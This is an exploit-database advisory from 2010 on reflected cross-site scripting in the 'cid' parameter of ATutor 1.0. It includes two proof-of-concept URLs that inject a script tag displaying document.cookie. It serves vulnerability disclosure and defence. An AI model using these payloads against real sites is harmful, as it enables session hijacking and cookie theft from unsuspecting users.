ATutor 1.0 – Multiple ‘cid’ Cross-Site Scripting Vulnerabilities

  • 作者: High-Tech Bridge SA
    日期: 2010-09-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34631/
  • source: https://www.securityfocus.com/bid/43241/info
    
    ATutor is prone to multiple cross-site scripting vulnerabilities.
    
    An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
    
    ATutor 1.0 is vulnerable, other versions may also be affected. 
    
    http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
    
    http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>